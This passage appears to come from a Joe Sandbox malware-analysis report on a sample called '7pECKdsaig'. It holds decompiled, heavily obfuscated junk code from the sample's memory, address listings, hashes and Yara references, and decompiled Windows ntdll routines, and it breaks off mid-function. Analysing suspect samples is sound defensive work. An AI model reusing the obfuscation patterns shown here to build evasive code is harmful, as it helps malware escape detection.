					__edx = __edx + 1;
					__esi = __esi |  *0x589af96f;
					__edx = __edx ^  *0x9a4c51b8;
					__bh =  *0xbbaa1534;
					__edi = __edi &  *0x88f84931;
					__edi = __edi + 0xceb115db;
					__ecx =  *0x1fc6ea93;
					 *0x1fc6ea93 = 0xed012f6e;
					_push(0xe2658ded);
					__ebp = __ebp -  *0x764fa967;
					__eflags = __ebp;
					if(__ebp < 0) {
						goto L1;
					}
					 *0x97f8cc78 - __ebx = __ebx -  *0xa712e631;
					asm("rol byte [0xc9c3e3a0], 0xfe");
					_push( *0x64c503c1);
					__al = __al |  *0x25d9d024;
					__esp = __esp + 1;
					 *0x4bff8101 = __ebx;
					__ebp = __ebp ^ 0x09c2d46c;
					 *0xb367c10e = __edx;
					 *0x33689ff7 =  *0x33689ff7 & __esp;
					__edx = __edx ^  *0xac27b705;
					asm("rcl byte [0x117bf4d7], 0xba");
					 *0x6b5a459e = __edx;
					 *0x33074509 =  *0x33074509 >> 5;
					__edi = __edi | 0x9296cc1d;
					 *0x4e421dfe =  *0x4e421dfe - __ebp;
					_push(__esp);
					 *0x99c63119 =  *0x99c63119 >> 0xdc;
					__ebx = __ebx & 0x11a5c001;
					_push(__ebp);
					__eflags = __esp & 0xb8f328d8;
					__edi = __edi ^ 0x3a341a1d;
					__ecx = __ecx + 1;
					__ebx = __ebx - 1;
					__esi = __esi + 0xc1c636fa;
					__edx =  *0x294db76a * 0xee69;
					asm("adc esi, 0x85f851f1");
					__eflags = __edx -  *0x9d403501;
					if(__edx <  *0x9d403501) {
						goto L1;
					}
					__esi =  *0xeb65e97c * 0x8ffc;
					__edi = __edi &  *0x3c8283db;
					 *0xfca3a902 =  *0xfca3a902 << 0xfe;
					__ebx = __ebx ^ 0xf8907f8d;
					__dl = 0xd2;
					 *0xe1c29cd6 =  *0xe1c29cd6 >> 0xb8;
					__dh = __dh -  *0xe1082e10;
					__ebp = __ebp + 1;
					__ecx = __ecx +  *0x8f64031;
					__eflags = __ecx;
					if(__ecx < 0) {
						goto L1;
					}
					__ebp = __ebp +  *0xdec38572;
					__ebp = __ebp +  *0x1d790eee;
					__eflags = __edx -  *0x9d4c6f11;
					__esp = __esp -  *0xae3304ed;
					__eflags =  *0x920ca0e7 & __bl;
					 *0xfae49cf3 =  *0xfae49cf3 | __ebp;
					asm("rcl dword [0xe00a548c], 0x56");
					L1();
					__edx = __edx +  *0x7649dae8;
					__bl = __bl | 0x00000020;
					asm("ror byte [0x3ad68c30], 0x5e");
					__eflags = __esi;
					_pop(__ecx);
					if(__eflags != 0) {
						goto L1;
					}
					__edx = 0x93616f7a;
					 *0x12a89a24 =  *0x12a89a24 >> 0x39;
					asm("stosb");
					if(__eflags != 0) {
						goto L1;
					}
					_push( *0xc04e975);
					asm("rol dword [0xe26fe20f], 0x88");
					 *0xcac9cad2 =  *0xcac9cad2 | __ch;
					__eflags =  *0xcac9cad2;
					return __eax;
				}
				L1:
				 *0x1be1c709 =  *0x1be1c709 << 0xb3;
				asm("adc esi, [0x6a6f2b6e]");
				if( *0x1be1c709 > 0) {
					_t49 = _t49 &  *0x4e0d0f76;
				}
				goto L1;
			}

0x00a9d5ad
0x00a9d5b3
0x00a9d5b4
0x00a9d5bb
0x00a9d5bd
0x00a9d5c4
0x00a9d5cb
0x00a9d5cc
0x00a9d5d2
0x00a9d5d2
0x00a9d5d3
0x00000000
0x00000000
0x00a9d5d5
0x00a9d5db
0x00a9d5e1
0x00a9d5e8
0x00a9d5ee
0x00a9d5f0
0x00a9d5f6
0x00a9d5fd
0x00a9d603
0x00a9d60a
0x00a9d610
0x00a9d610
0x00a9d610
0x00a9d616
0x00a9d61c
0x00000000
0x00000000
0x00a9d622
0x00a9d627
0x00a9d62d
0x00a9d633
0x00000000
0x00000000
0x00a9d639
0x00a9d643
0x00a9d649
0x00a9d64e
0x00a9d64e
0x00a9d654
0x00000000
0x00000000
0x00a9d65a
0x00a9d660
0x00a9d667
0x00a9d668
0x00a9d669
0x00a9d670
0x00a9d675
0x00a9d676
0x00a9d678
0x00a9d67e
0x00a9d684
0x00a9d68b
0x00a9d68b
0x00a9d68b
0x00a9d691
0x00a9d698
0x00a9d69f
0x00a9d6a5
0x00a9d6ab
0x00a9d6b1
0x00a9d6b7
0x00a9d6bd
0x00a9d6bd
0x00a9d6bf
0x00000000
0x00000000
0x00a9d6c5
0x00a9d6cb
0x00a9d6cc
0x00a9d6d3
0x00a9d6d9
0x00a9d6df
0x00a9d6e5
0x00a9d6ec
0x00a9d6f2
0x00a9d6f2
0x00a9d6f2
0x00a9d6f8
0x00a9d6f8
0x00a9d6fe
0x00a9d704
0x00000000
0x00000000
0x00a9d70a
0x00a9d714
0x00a9d715
0x00a9d71b
0x00a9d721
0x00a9d727
0x00a9d72e
0x00a9d734
0x00a9d73a
0x00a9d740
0x00a9d746
0x00a9d74c
0x00a9d753
0x00a9d759
0x00a9d75a
0x00a9d761
0x00a9d767
0x00a9d76d
0x00a9d773
0x00a9d77a
0x00a9d780
0x00a9d786
0x00a9d787
0x00a9d78d
0x00a9d793
0x00a9d79a
0x00a9d7a0
0x00a9d7a6
0x00a9d7a7
0x00a9d7a7
0x00a9d7ad
0x00a9d7b3
0x00a9d7b4
0x00000000
0x00000000
0x00a9d7ba
0x00a9d7c0
0x00a9d7c0
0x00a9d7c6
0x00a9d7cc
0x00000000
0x00000000
0x00a9d7d2
0x00a9d7d8
0x00a9d7db
0x00a9d7e1
0x00a9d7e7
0x00a9d7ed
0x00a9d7ed
0x00a9d7f7
0x00a9d7fe
0x00a9d805
0x00000000
0x00000000
0x00a9d80b
0x00a9d811
0x00a9d817
0x00a9d818
0x00a9d822
0x00a9d828
0x00a9d828
0x00a9d82e
0x00000000
0x00000000
0x00a9d834
0x00a9d83a
0x00a9d840
0x00a9d841
0x00a9d841
0x00a9d843
0x00000000
0x00000000
0x00a9d849
0x00a9d84f
0x00a9d855
0x00000000
0x00000000
0x00a9d85b
0x00a9d861
0x00a9d868
0x00a9d869
0x00a9d870
0x00a9d876
0x00a9d87c
0x00a9d882
0x00a9d888
0x00a9d88f
0x00a9d895
0x00a9d89b
0x00a9d8a2
0x00a9d8a8
0x00a9d8ae
0x00000000
0x00000000
0x00a9d8b4
0x00a9d8ba
0x00a9d8c1
0x00a9d8c7
0x00a9d8cd
0x00a9d8d3
0x00a9d8d9
0x00a9d8e3
0x00a9d8e3
0x00a9d8e3
0x00a9d8e9
0x00a9d8f0
0x00a9d8f6
0x00a9d8f6
0x00a9d8fc
0x00000000
0x00000000
0x00a9d902
0x00a9d902
0x00a9d908
0x00000000
0x00000000
0x00a9d90e
0x00a9d915
0x00a9d91b
0x00a9d922
0x00a9d928
0x00a9d935
0x00a9d93b
0x00a9d940
0x00a9d946
0x00a9d947
0x00000000
0x00000000
0x00a9d94d
0x00a9d953
0x00a9d959
0x00a9d95f
0x00a9d966
0x00a9d970
0x00a9d976
0x00a9d976
0x00a9d97c
0x00000000
0x00000000
0x00a9d982
0x00a9d988
0x00a9d98e
0x00a9d98f
0x00a9d98f
0x00a9d995
0x00000000
0x00000000
0x00a9d99b
0x00a9d9a1
0x00a9d9a2
0x00a9d9a3
0x00a9d9a9
0x00a9d9b0
0x00a9d9b6
0x00a9d9bb
0x00a9d9c1
0x00a9d9c7
0x00a9d9c8
0x00a9d9ce
0x00a9d9d0
0x00a9d9d6
0x00a9d9d6
0x00a9d9d9
0x00000000
0x00000000
0x00a9d9df
0x00a9d9e5
0x00a9d9eb
0x00a9d9f1
0x00a9d9f7
0x00a9d9fd
0x00a9da03
0x00a9da03
0x00a9da09
0x00a9da0f
0x00a9da11
0x00a9da18
0x00000000
0x00000000
0x00a9da1e
0x00a9da28
0x00a9da2e
0x00a9da35
0x00a9da35
0x00a9da3b
0x00000000
0x00000000
0x00a9da41
0x00a9da4b
0x00a9da51
0x00a9da53
0x00a9da58
0x00a9da5e
0x00a9da65
0x00a9da67
0x00a9da6d
0x00a9da73
0x00a9da74
0x00a9da7b
0x00a9da81
0x00a9da81
0x00a9da87
0x00a9da88
0x00a9da8a
0x00a9da90
0x00a9da97
0x00a9da9e
0x00a9daa5
0x00a9daa5
0x00a9daa5
0x00a9daab
0x00a9dab1
0x00a9dab6
0x00a9dac0
0x00a9dac6
0x00a9dacc
0x00a9dad3
0x00a9dada
0x00a9dae7
0x00a9daed
0x00a9daf3
0x00a9daf9
0x00a9db00
0x00a9db06
0x00a9db09
0x00a9db0f
0x00a9db12
0x00a9db18
0x00a9db1e
0x00a9db24
0x00a9db24
0x00a9db24
0x00a9db2a
0x00a9db30
0x00a9db37
0x00a9db38
0x00a9db3e
0x00a9db43
0x00a9db46
0x00a9db46
0x00a9db46
0x00a9db4c
0x00a9db52
0x00a9db58
0x00a9db5e
0x00a9db64
0x00a9db6a
0x00a9db70
0x00a9db76
0x00a9db7c
0x00a9db82
0x00a9db85
0x00a9db8b
0x00a9db92
0x00a9db97
0x00a9db9d
0x00a9db9d
0x00a9dba3
0x00a9dbaa
0x00a9dbb0
0x00000000
0x00000000
0x00a9dbb6
0x00a9dbbc
0x00a9dbc2
0x00000000
0x00000000
0x00a9dbc8
0x00a9dbce
0x00a9dbd4
0x00a9dbd5
0x00a9dbdb
0x00a9dbe1
0x00a9dbe7
0x00a9dbee
0x00a9dbf4
0x00a9dbfa
0x00a9dc05
0x00a9dc0b
0x00a9dc11
0x00000000
0x00000000
0x00a9dc17
0x00a9dc1d
0x00a9dc20
0x00a9dc26
0x00a9dc2c
0x00a9dc2e
0x00a9dc34
0x00a9dc39
0x00a9dc3f
0x00a9dc46
0x00a9dc4d
0x00a9dc54
0x00a9dc5a
0x00a9dc60
0x00a9dc66
0x00a9dc6c
0x00a9dc72
0x00a9dc78
0x00a9dc7f
0x00a9dc82
0x00a9dc82
0x00a9dc88
0x00a9dc8e
0x00000000
0x00000000
0x00a9dc94
0x00a9dc9a
0x00a9dca1
0x00a9dca8
0x00a9dcae
0x00a9dcaf
0x00a9dcb6
0x00a9dcbc
0x00a9dcbd
0x00a9dcc3
0x00a9dcc4
0x00a9dcca
0x00a9dcd0
0x00a9dcd0
0x00a9dcd3
0x00a9dcda
0x00000000
0x00000000
0x00a9dce0
0x00a9dce6
0x00a9dced
0x00a9dcef
0x00a9dcf0
0x00a9dcf3
0x00a9dcfa
0x00a9dd00
0x00a9dd01
0x00a9dd07
0x00a9dd0d
0x00a9dd13
0x00a9dd19
0x00a9dd1f
0x00a9dd1f
0x00a9dd25
0x00a9dd2a
0x00a9dd2a
0x00a9dd30
0x00000000
0x00000000
0x00a9dd3c
0x00a9dd42
0x00a9dd49
0x00a9dd4f
0x00a9dd55
0x00a9dd56
0x00a9dd5c
0x00a9dd62
0x00a9dd68
0x00a9dd6e
0x00a9dd74
0x00a9dd7b
0x00a9dd81
0x00a9dd88
0x00a9dd8e
0x00a9dd94
0x00a9dd95
0x00a9dd9c
0x00a9dda2
0x00a9dda3
0x00a9dda9
0x00a9ddaf
0x00a9ddb0
0x00a9ddb1
0x00a9ddb7
0x00a9ddc1
0x00a9ddc7
0x00a9ddcd
0x00000000
0x00000000
0x00a9ddd3
0x00a9dddd
0x00a9dde3
0x00a9ddea
0x00a9ddf0
0x00a9ddf2
0x00a9ddf9
0x00a9ddff
0x00a9de00
0x00a9de00
0x00a9de06
0x00000000
0x00000000
0x00a9de0c
0x00a9de12
0x00a9de18
0x00a9de1e
0x00a9de24
0x00a9de2a
0x00a9de30
0x00a9de37
0x00a9de3c
0x00a9de42
0x00a9de45
0x00a9de4c
0x00a9de52
0x00a9de53
0x00000000
0x00000000
0x00a9de59
0x00a9de5e
0x00a9de65
0x00a9de66
0x00000000
0x00000000
0x00a9de6c
0x00a9de72
0x00a9de79
0x00a9de79
0x00a9de7f
0x00a9de7f
0x00a9d596
0x00a9d596
0x00a9d59d
0x00a9d5a3
0x00a9d5a5
0x00a9d5a5
0x00000000

Strings

nKyo, xrefs: 00A9D9BB

Memory Dump Source

Source File: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000000.00000002.288819285.0000000000A80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.288891710.0000000000A9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.288903814.0000000000AA0000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a80000_7pECKdsaig.jbxd

Yara matches

Similarity

API ID:
String ID: nKyo
API String ID: 0-2776793979
Opcode ID: f916cfc32c9f2a9d24e1404cf926d6467ac852c2d6caaa7f14e03905002fedbb
Instruction ID: da40c531c293bb8c0dcb9531c5d487d6325c0e47b5cd281460a7a632ec621819
Opcode Fuzzy Hash: f916cfc32c9f2a9d24e1404cf926d6467ac852c2d6caaa7f14e03905002fedbb
Instruction Fuzzy Hash: 7322A772A08385CFDB16CF38D88AB113FB1F35A3A4B49824ED9A1A71D2D734255ACF45

Uniqueness

Uniqueness Score: -1.00%

Function 0174FAB0 Relevance: 1.6, Strings: 1, Instructions: 306
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E0174FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					L0172EEF0(0x1807b60);
					_t134 =  *0x1807b84; // 0x77e47b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x1807b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x1807b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = L01726D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														L017276E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E017B8938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E0171B150();
													}
													_t116 = L017B6D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = L017275CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x1808638; // 0x14567b0
																	_t122 = L017238A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			L017276E2(_t154);
																			goto L41;
																		}
																	} else {
																		L017276E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L0174FCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L017270F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E0174FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = L0174FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E0174FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = L0174FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E0174FD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x1807b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x1807b84 = _t75;
						_t73 = E0172EB70(_t134, 0x1807b60);
						if( *0x1807b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = L0172FF60( *0x1807b20);
							}
						}
						goto L5;
					}
				}
			}

0x0174fab0
0x0174fab2
0x0174fab3
0x0174fab4
0x0174fabc
0x0174fac0
0x0174fb14
0x0174fb17
0x0174fac2
0x0174fac8
0x0174facd
0x0174fad3
0x0174fad3
0x0174fadd
0x0174fb18
0x0174fb1b
0x0174fb1d
0x0174fb1e
0x0174fb1f
0x0174fb20
0x0174fb21
0x0174fb22
0x0174fb23
0x0174fb24
0x0174fb25
0x0174fb26
0x0174fb27
0x0174fb28
0x0174fb29
0x0174fb2a
0x0174fb2b
0x0174fb2c
0x0174fb2d
0x0174fb2e
0x0174fb2f
0x0174fb3a
0x0174fb3b
0x0174fb3e
0x0174fb41
0x0174fb44
0x0174fb47
0x0174fb4a
0x0174fb4d
0x0174fb53
0x0178bdcb
0x0178bdcb
0x0174fb59
0x0174fb5b
0x0174fb5b
0x0174fb5e
0x0178bdd5
0x0178bdd8
0x00000000
0x0178bdda
0x00000000
0x0178bdda
0x0174fb64
0x0174fb64
0x0174fb64
0x0174fb67
0x0174fb6e
0x0174fb70
0x0174fb72
0x00000000
0x0174fb78
0x0174fb7a
0x0174fb7a
0x0174fb7d
0x0174fb80
0x0178bddf
0x0178bde1
0x00000000
0x0178bde3
0x00000000
0x0178bde3
0x0174fb86
0x0174fb86
0x0174fb86
0x0174fb8b
0x0174fb90
0x0174fb92
0x0174fb94
0x0174fb9a
0x0174fb9b
0x0174fba1
0x0178bde8
0x0178bdeb
0x0178bded
0x0178beb5
0x0178beb5
0x0178bebb
0x0178bebd
0x0178bec3
0x0178bed2
0x0178bedd
0x0178bedd
0x0178beed
0x00000000
0x0178bdf3
0x0178bdfe
0x0178be06
0x0178be0b
0x0178be0d
0x0178be0f
0x0178be14
0x0178be19
0x0178be20
0x0178be25
0x0178be27
0x0178be35
0x0178be39
0x0178be46
0x0178be4f
0x0178be54
0x0178be56
0x0178bef8
0x0178bef8
0x00000000
0x0178be5c
0x0178be5c
0x0178be60
0x00000000
0x0178be66
0x0178be66
0x0178be7f
0x0178be84
0x0178be87
0x0178be89
0x0178be8b
0x0178be99
0x0178be9d
0x0178bea0
0x0178beac
0x0178beaf
0x0178beb1
0x0178beb3
0x0178beb3
0x00000000
0x0178bea2
0x0178bea2
0x00000000
0x0178bea2
0x0178be8d
0x0178be8d
0x0178be92
0x00000000
0x0178be92
0x0178be8b
0x0178be60
0x0178be3b
0x0178be3b
0x0178be3e
0x00000000
0x0178be40
0x0178be40
0x0178be44
0x00000000
0x00000000
0x00000000
0x00000000
0x0178be44
0x0178be3e
0x0178be29
0x0178be29
0x00000000
0x0178be29
0x0178be27
0x00000000
0x0174fba7
0x0174fba7
0x0174fbab
0x0178bf02
0x0174fbb1
0x0174fbb1
0x0174fbb8
0x0174fbbd
0x0174fbbd
0x0174fbbf
0x0174fbbf
0x0174fbc5
0x0174fbcb
0x0174fbf8
0x0174fbf8
0x0174fbfa
0x00000000
0x0174fc00
0x0174fc00
0x0174fc03
0x00000000
0x0174fc09
0x0174fc09
0x0174fc0f
0x0174fc15
0x0174fc23
0x0174fc23
0x0174fc25
0x0174fc27
0x0174fc75
0x0174fc7c
0x0174fc84
0x00000000
0x0174fc29
0x0174fc29
0x0174fc2d
0x0174fc30
0x0178bf0f
0x00000000
0x0174fc36
0x0174fc38
0x0174fc3b
0x0174fc41
0x0178bf17
0x0178bf19
0x0178bf48
0x0178bf4b
0x00000000
0x0178bf1b
0x0178bf22
0x0178bf24
0x0178bf26
0x00000000
0x0178bf2c
0x0178bf37
0x0178bf39
0x0178bf3b
0x00000000
0x0178bf41
0x0178bf41
0x0178bf41
0x0178bf41
0x0178bf45
0x00000000
0x0178bf45
0x0178bf3b
0x0178bf26
0x00000000
0x0174fc47
0x0174fc47
0x0174fc49
0x0174fcb2
0x0174fcb4
0x0174fcb6
0x0174fcdc
0x0174fcdc
0x00000000
0x0174fcb8
0x0174fcc3
0x0174fcc5
0x0174fcc7
0x00000000
0x0174fcc9
0x0174fcc9
0x0174fccd
0x00000000
0x0174fccd
0x0174fcc7
0x00000000
0x0174fc4b
0x0174fc4b
0x0174fc4e
0x0174fc4e
0x0174fc51
0x0174fc51
0x0174fc54
0x0174fc5a
0x0174fc5c
0x0174fc5f
0x0174fc61
0x0174fc63
0x0174fc65
0x0174fc67
0x0174fc6e
0x0174fc72
0x0174fc72
0x0174fc72
0x0174fc72
0x0174fc67
0x0174fc61
0x00000000
0x0174fc5a
0x0174fc49
0x0174fc41
0x0174fc30
0x0174fc27
0x0174fc03
0x0174fbcd
0x0174fbd3
0x0174fbd9
0x0174fbdc
0x0174fbde
0x0174fc99
0x0174fc9b
0x0174fc9d
0x0174fcd5
0x0174fcd5
0x0174fc89
0x0174fc89
0x00000000
0x0174fc9f
0x0174fc9f
0x0174fca3
0x00000000
0x0174fca3
0x00000000
0x0174fbe4
0x0174fbe4
0x0174fbe4
0x0174fbe4
0x0174fbe9
0x0174fbf2
0x00000000
0x0174fbf2
0x0174fbde
0x0174fbcb
0x0174fbab
0x0174fc8b
0x0174fc8b
0x0174fc8c
0x0174fb80
0x0174fb72
0x0174fb5e
0x0174fc8d
0x0174fc91
0x0174fadf
0x0174fadf
0x0174fae1
0x0174fae4
0x0174fae7
0x0174faec
0x0174faf8
0x0174fb00
0x0174fb07
0x0174fb0f
0x0174fb0f
0x0174fb07
0x00000000
0x0174faf8
0x0174fadd

Strings

*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0178BE0F

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
API String ID: 0-865735534
Opcode ID: 9650818791928298a2291c2524c83ea47349405d3ca81389bfb7c34e65bb408f
Instruction ID: eb2f7db5cab152484e313ca563884eb3a73d1c6ec6383e1c1cc717597f435889
Opcode Fuzzy Hash: 9650818791928298a2291c2524c83ea47349405d3ca81389bfb7c34e65bb408f
Instruction Fuzzy Hash: 07A12531B00A069FEB26EF6CC454B7AF7A5AF49710F04456EEA46DB781DB30D941CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0174F0BF Relevance: 1.4, Strings: 1, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E0174F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E01734120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
